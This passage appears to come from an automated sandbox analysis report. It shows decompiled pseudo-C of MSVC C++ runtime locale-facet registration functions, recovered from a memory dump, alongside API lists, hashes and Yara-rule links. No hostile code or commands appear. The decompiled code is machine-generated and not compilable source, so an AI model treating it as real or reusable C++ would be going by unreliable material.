							 *0x6de96dd0 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDFC90
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDFC9A
int.LIBCPMT ref: 6DDDFCB1

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDFCEB
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDFD0B
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDFD29

Strings

`mm, xrefs: 6DDDFCA5

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: `mm
API String ID: 651022567-4209129558
Opcode ID: 1eac9f68c0e85ff5a94b0829cd57c23cbaa267ca3967cf6b0f5389e7e997b6d6
Instruction ID: 28fe5fdf78197cc18ebc6580fc01403bc14ae7d8aa53fd79641eb367f98ebf02
Opcode Fuzzy Hash: 1eac9f68c0e85ff5a94b0829cd57c23cbaa267ca3967cf6b0f5389e7e997b6d6
Instruction Fuzzy Hash: 7211C275948229DBCF01FB64C840AFDB775AF84318F264409F521AB290DF749A01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF8A5, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDDF8A5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t305 = __edx;
				_t234 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t330 - 0x14, 0);
				_t315 =  *0x6de96db0; // 0x0
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6DDB161C(0x6de96d64);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6DDD66BA(_t330 - 0x14);
					return E6DDF0075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6DDE13A1(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t330 - 0x20);
							E6DDF3D74(_t330 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t307, _t315, 0x14);
							E6DDD6653(_t330 - 0x14, 0);
							_t316 =  *0x6de96ddc; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6DDB161C(0x6de96d88);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6DDD66BA(_t330 - 0x14);
								return E6DDF0075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6DDE1409(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t330 - 0x20);
										E6DDF3D74(_t330 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t234, _t308, _t316, 0x14);
										E6DDD6653(_t330 - 0x14, 0);
										_t317 =  *0x6de96de0; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6DDB161C(0x6de96d8c);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6DDD66BA(_t330 - 0x14);
											return E6DDF0075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6DDE1471(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t330 - 0x20);
													E6DDF3D74(_t330 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t234, _t309, _t317, 0x14);
													E6DDD6653(_t330 - 0x14, 0);
													_t318 =  *0x6de96dfc; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6DDB161C(0x6de96da8);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6DDD66BA(_t330 - 0x14);
														return E6DDF0075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6DDE14EC(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t330 - 0x20);
																E6DDF3D74(_t330 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t234, _t310, _t318, 0x14);
																E6DDD6653(_t330 - 0x14, 0);
																_t319 =  *0x6de96dcc; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6DDB161C(0x6de96d80);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6DDD66BA(_t330 - 0x14);
																	return E6DDF0075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6DDE1558(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t330 - 0x20);
																			E6DDF3D74(_t330 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t234, _t311, _t319, 0x14);
																			E6DDD6653(_t330 - 0x14, 0);
																			_t320 =  *0x6de96e00; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6DDB161C(0x6de96dac);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6DDD66BA(_t330 - 0x14);
																				return E6DDF0075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6DDE15C4(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t330 - 0x20);
																						E6DDF3D74(_t330 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t234, _t312, _t320, 0x14);
																						E6DDD6653(_t330 - 0x14, 0);
																						_t321 =  *0x6de96dd0; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6DDB161C(0x6de96d60);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6DDD66BA(_t330 - 0x14);
																							return E6DDF0075(_t313);
																						} else {
																							__eflags = _t321;
																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6DDE162A(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6DDB1438(_t283);
																									E6DDF3D74(_t330 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de3851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6de3c0c4;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6DDE542F(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6DDF0075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6DDD6FD3(__eflags, _t313);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6de96dd0 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6DDD6FD3(__eflags, _t312);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6de96e00 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6DDD6FD3(__eflags, _t311);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6de96dcc = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6DDD6FD3(__eflags, _t310);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6de96dfc = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6DDD6FD3(__eflags, _t309);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6de96de0 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6DDD6FD3(__eflags, _t308);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6de96ddc = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6DDD6FD3(__eflags, _t307);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6de96db0 = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF8AC
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF8B6
int.LIBCPMT ref: 6DDDF8CD

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDF907
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF927
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF945

Strings

dmm, xrefs: 6DDDF8C1

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: dmm
API String ID: 651022567-1634957888
Opcode ID: 750d29962bce2d96545cfe75a1c5af22c0e102c2523ce907a12acfcb66a72f8e
Instruction ID: 622732482d85de6770702ea4bad8aeaa75381fd61cdaeee2055d166b622c6fe9
Opcode Fuzzy Hash: 750d29962bce2d96545cfe75a1c5af22c0e102c2523ce907a12acfcb66a72f8e
Instruction Fuzzy Hash: 7111A075D08559DBCF05FBA4C840AFDB7B4AF44318F260009F611AB291DF749A02CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEBBD6, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6DDEBBD6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t66 - 0x14, 0);
				_t63 =  *0x6de96e44; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6DDB161C(0x6de96e24);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6DDB171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6DDD66BA(_t66 - 0x14);
					return E6DDF0075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6DDEC295(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6DDB1438(_t55);
							E6DDF3D74(_t66 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de3851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6de3c414;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6DDED028(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6DDF0075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6DDD6FD3(__eflags, _t61);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6de96e44 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDEBBDD
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEBBE7
int.LIBCPMT ref: 6DDEBBFE

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDEBC38
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEBC58
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEBC76

Strings

$nm, xrefs: 6DDEBBF2

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: $nm
API String ID: 651022567-696978172
Opcode ID: 4298f1c62ef1ffdbdf2334b90e4f21af263d7f5ec6f499c1de2c6027746730be
Instruction ID: 4cdc068e590627b12180cbe415b8556feb5e3cbb72a92fb4c0172b24f6db1385
Opcode Fuzzy Hash: 4298f1c62ef1ffdbdf2334b90e4f21af263d7f5ec6f499c1de2c6027746730be
Instruction Fuzzy Hash: 7F11A075909219DBCF01FBA4C840BBDB7B5AF44718F270009F611AB290DF74AA01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEBB30, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6DDEBB30(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t42;
				void* _t54;
				signed int _t93;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;

				_t79 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t110 - 0x14, 0);
				_t105 =  *0x6de96e40; // 0x0
				 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
				 *(_t110 - 0x10) = _t105;
				_t41 = E6DDB161C(0x6de96e20);
				_t82 =  *((intOrPtr*)(_t110 + 8));
				_t42 = E6DDB171B( *((intOrPtr*)(_t110 + 8)), _t41);
				_t102 = _t42;
				if(_t42 != 0) {
					L5:
					E6DDD66BA(_t110 - 0x14);
					return E6DDF0075(_t102);
				} else {
					if(_t105 == 0) {
						_push( *((intOrPtr*)(_t110 + 8)));
						_push(_t110 - 0x10);
						__eflags = E6DDEC229(__ebx, _t82, __edx, _t102, _t105) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t110 - 0x20);
							E6DDF3D74(_t110 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t102, _t105, 0x14);
							E6DDD6653(_t110 - 0x14, 0);
							_t106 =  *0x6de96e44; // 0x0
							 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
							 *(_t110 - 0x10) = _t106;
							_t54 = E6DDB161C(0x6de96e24);
							_t89 =  *((intOrPtr*)(_t110 + 8));
							_t103 = E6DDB171B( *((intOrPtr*)(_t110 + 8)), _t54);
							__eflags = _t103;
							if(_t103 != 0) {
								L12:
								E6DDD66BA(_t110 - 0x14);
								return E6DDF0075(_t103);
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									_push( *((intOrPtr*)(_t110 + 8)));
									_push(_t110 - 0x10);
									__eflags = E6DDEC295(__ebx, _t89, __edx, _t103, _t106) - 0xffffffff;
									if(__eflags == 0) {
										_t93 = _t110 - 0x20;
										E6DDB1438(_t93);
										E6DDF3D74(_t110 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de3851f, _t79, _t103, _t106, 4);
										_t107 = _t93;
										 *(_t110 - 0x10) = _t107;
										 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t110 + 0xc));
										_push( *((intOrPtr*)(_t110 + 0x14)));
										_t35 = _t110 - 4;
										 *_t35 =  *(_t110 - 4) & 0x00000000;
										__eflags =  *_t35;
										 *_t107 = 0x6de3c414;
										 *((char*)(_t107 + 0x28)) =  *((intOrPtr*)(_t110 + 0x10));
										E6DDED028(_t79, _t93, __edx, _t103, _t107,  *_t35);
										return E6DDF0075(_t107,  *((intOrPtr*)(_t110 + 8)));
									} else {
										_t103 =  *(_t110 - 0x10);
										 *(_t110 - 0x10) = _t103;
										 *(_t110 - 4) = 1;
										E6DDD6FD3(__eflags, _t103);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 4))))();
										 *0x6de96e44 = _t103;
										goto L12;
									}
								} else {
									_t103 = _t106;
									goto L12;
								}
							}
						} else {
							_t102 =  *(_t110 - 0x10);
							 *(_t110 - 0x10) = _t102;
							 *(_t110 - 4) = 1;
							E6DDD6FD3(__eflags, _t102);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
							 *0x6de96e40 = _t102;
							goto L5;
						}
					} else {
						_t102 = _t105;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDEBB37
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEBB41
int.LIBCPMT ref: 6DDEBB58

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDEBB92
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEBBB2
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEBBD0

Strings

nm, xrefs: 6DDEBB4C

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: nm
API String ID: 651022567-2988067050
Opcode ID: 8352e751a791ddb1f79f5c1b3ed9798219c39cb4e0f48fb5b406a4bde38e58f6
Instruction ID: 54befaea2db2728a0bb4802151e3bdb625ca81c9a704962b68d8e6a1e9369386
Opcode Fuzzy Hash: 8352e751a791ddb1f79f5c1b3ed9798219c39cb4e0f48fb5b406a4bde38e58f6
Instruction Fuzzy Hash: F911A075808619DBCF05FBA4C840AFEB775AF44358F270519F511AB290DF74AA018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF4C1, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDF4C1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t195;
				signed int _t196;
				void* _t208;
				void* _t221;
				void* _t234;
				void* _t247;
				void* _t260;
				void* _t273;
				void* _t286;
				void* _t299;
				void* _t312;
				void* _t325;
				void* _t338;
				void* _t351;
				signed int _t511;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t570;
				signed int _t571;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				signed int _t576;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				void* _t594;

				_t551 = __edx;
				_t420 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t594 - 0x14, 0);
				_t567 =  *0x6de96dc0; // 0x0
				 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
				 *(_t594 - 0x10) = _t567;
				_t195 = E6DDB161C(0x6de96d74);
				_t423 =  *((intOrPtr*)(_t594 + 8));
				_t196 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t195);
				_t553 = _t196;
				if(_t196 != 0) {
					L5:
					E6DDD66BA(_t594 - 0x14);
					return E6DDF0075(_t553);
				} else {
					if(_t567 == 0) {
						_push( *((intOrPtr*)(_t594 + 8)));
						_push(_t594 - 0x10);
						__eflags = E6DDE10BF(__ebx, _t423, __edx, _t553, _t567) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t594 - 0x20);
							E6DDF3D74(_t594 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t553, _t567, 0x14);
							E6DDD6653(_t594 - 0x14, 0);
							_t568 =  *0x6de96df8; // 0x0
							 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
							 *(_t594 - 0x10) = _t568;
							_t208 = E6DDB161C(0x6de96da4);
							_t430 =  *((intOrPtr*)(_t594 + 8));
							_t554 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t208);
							__eflags = _t554;
							if(_t554 != 0) {
								L12:
								E6DDD66BA(_t594 - 0x14);
								return E6DDF0075(_t554);
							} else {
								__eflags = _t568;
								if(_t568 == 0) {
									_push( *((intOrPtr*)(_t594 + 8)));
									_push(_t594 - 0x10);
									__eflags = E6DDE1127(_t420, _t430, __edx, _t554, _t568) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t594 - 0x20);
										E6DDF3D74(_t594 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t420, _t554, _t568, 0x14);
										E6DDD6653(_t594 - 0x14, 0);
										_t569 =  *0x6de96df4; // 0x0
										 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
										 *(_t594 - 0x10) = _t569;
										_t221 = E6DDB161C(0x6de96da0);
										_t437 =  *((intOrPtr*)(_t594 + 8));
										_t555 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t221);
										__eflags = _t555;
										if(_t555 != 0) {
											L19:
											E6DDD66BA(_t594 - 0x14);
											return E6DDF0075(_t555);
										} else {
											__eflags = _t569;
											if(_t569 == 0) {
												_push( *((intOrPtr*)(_t594 + 8)));
												_push(_t594 - 0x10);
												__eflags = E6DDE11AB(_t420, _t437, __edx, _t555, _t569) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t594 - 0x20);
													E6DDF3D74(_t594 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t420, _t555, _t569, 0x14);
													E6DDD6653(_t594 - 0x14, 0);
													_t570 =  *0x6de96dc8; // 0x0
													 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
													 *(_t594 - 0x10) = _t570;
													_t234 = E6DDB161C(0x6de96d7c);
													_t444 =  *((intOrPtr*)(_t594 + 8));
													_t556 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t234);
													__eflags = _t556;
													if(_t556 != 0) {
														L26:
														E6DDD66BA(_t594 - 0x14);
														return E6DDF0075(_t556);
													} else {
														__eflags = _t570;
														if(_t570 == 0) {
															_push( *((intOrPtr*)(_t594 + 8)));
															_push(_t594 - 0x10);
															__eflags = E6DDE1230(_t420, _t444, _t551, _t556, _t570) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t594 - 0x20);
																E6DDF3D74(_t594 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t420, _t556, _t570, 0x14);
																E6DDD6653(_t594 - 0x14, 0);
																_t571 =  *0x6de96dc4; // 0x0
																 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																 *(_t594 - 0x10) = _t571;
																_t247 = E6DDB161C(0x6de96d78);
																_t451 =  *((intOrPtr*)(_t594 + 8));
																_t557 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t247);
																__eflags = _t557;
																if(_t557 != 0) {
																	L33:
																	E6DDD66BA(_t594 - 0x14);
																	return E6DDF0075(_t557);
																} else {
																	__eflags = _t571;
																	if(_t571 == 0) {
																		_push( *((intOrPtr*)(_t594 + 8)));
																		_push(_t594 - 0x10);
																		__eflags = E6DDE12B4(_t420, _t451, _t551, _t557, _t571) - 0xffffffff;
